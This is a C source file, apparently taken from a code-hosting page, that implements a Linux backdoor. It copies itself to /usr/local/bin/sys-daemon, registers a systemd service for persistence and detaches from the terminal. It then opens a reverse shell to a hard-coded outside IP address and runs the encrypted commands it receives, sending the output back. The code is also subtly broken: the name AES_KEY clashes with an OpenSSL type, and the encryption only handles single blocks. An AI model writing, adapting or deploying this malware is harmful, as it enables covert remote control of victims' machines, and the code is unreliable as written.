104 lines
2.7 KiB
C
104 lines
2.7 KiB
C
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <fcntl.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <arpa/inet.h>
|
|
#include <netinet/in.h>
|
|
#include <openssl/aes.h>
|
|
#include <openssl/sha.h>
|
|
|
|
#define SERVER_IP "212.113.119.5"
|
|
#define PORT_MIN 2000
|
|
#define PORT_MAX 3000
|
|
#define AES_KEY_SIZE 16
|
|
|
|
unsigned char AES_KEY[AES_KEY_SIZE];
|
|
|
|
void generate_aes_key() {
|
|
FILE *fp = popen("cat /sys/class/dmi/id/product_uuid", "r");
|
|
char buffer[256];
|
|
if (fp == NULL || fgets(buffer, sizeof(buffer), fp) == NULL) {
|
|
pclose(fp);
|
|
RAND_bytes(AES_KEY, AES_KEY_SIZE);
|
|
} else {
|
|
pclose(fp);
|
|
SHA256((unsigned char *)buffer, strlen(buffer), AES_KEY);
|
|
}
|
|
}
|
|
|
|
void encrypt(char *input, char *output) {
|
|
AES_KEY enc_key;
|
|
AES_set_encrypt_key(AES_KEY, 128, &enc_key);
|
|
AES_encrypt((unsigned char *)input, (unsigned char *)output, &enc_key);
|
|
}
|
|
|
|
void decrypt(char *input, char *output) {
|
|
AES_KEY dec_key;
|
|
AES_set_decrypt_key(AES_KEY, 128, &dec_key);
|
|
AES_decrypt((unsigned char *)input, (unsigned char *)output, &dec_key);
|
|
}
|
|
|
|
void hide_process() {
|
|
setsid();
|
|
chdir("/");
|
|
fclose(stdin);
|
|
fclose(stdout);
|
|
fclose(stderr);
|
|
}
|
|
|
|
void persist() {
|
|
char path[128], dest[128];
|
|
snprintf(path, sizeof(path), "/proc/%d/exe", getpid());
|
|
snprintf(dest, sizeof(dest), "/usr/local/bin/sys-daemon");
|
|
|
|
if (access(dest, F_OK) != 0) {
|
|
system("cp /proc/self/exe /usr/local/bin/sys-daemon");
|
|
system("chmod +x /usr/local/bin/sys-daemon");
|
|
system("echo '[Unit]\nDescription=System Daemon\nAfter=network.target\n[Service]\nExecStart=/usr/local/bin/sys-daemon\nRestart=always\n[Install]\nWantedBy=multi-user.target' > /etc/systemd/system/sys-daemon.service");
|
|
system("systemctl enable sys-daemon.service && systemctl start sys-daemon.service");
|
|
}
|
|
}
|
|
|
|
void reverse_shell(int port) {
|
|
int sock;
|
|
struct sockaddr_in server;
|
|
char buffer[1024], encrypted[1024], decrypted[1024];
|
|
|
|
sock = socket(AF_INET, SOCK_STREAM, 0);
|
|
server.sin_family = AF_INET;
|
|
server.sin_addr.s_addr = inet_addr(SERVER_IP);
|
|
server.sin_port = htons(port);
|
|
|
|
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
|
|
close(sock);
|
|
return;
|
|
}
|
|
|
|
while (1) {
|
|
recv(sock, encrypted, sizeof(encrypted), 0);
|
|
decrypt(encrypted, decrypted);
|
|
|
|
FILE *fp = popen(decrypted, "r");
|
|
fread(buffer, 1, sizeof(buffer), fp);
|
|
pclose(fp);
|
|
|
|
encrypt(buffer, encrypted);
|
|
send(sock, encrypted, sizeof(encrypted), 0);
|
|
}
|
|
|
|
close(sock);
|
|
}
|
|
|
|
int main() {
|
|
generate_aes_key();
|
|
persist();
|
|
hide_process();
|
|
|
|
int port = PORT_MIN + (rand() % (PORT_MAX - PORT_MIN + 1));
|
|
reverse_shell(port);
|
|
return 0;
|
|
}
|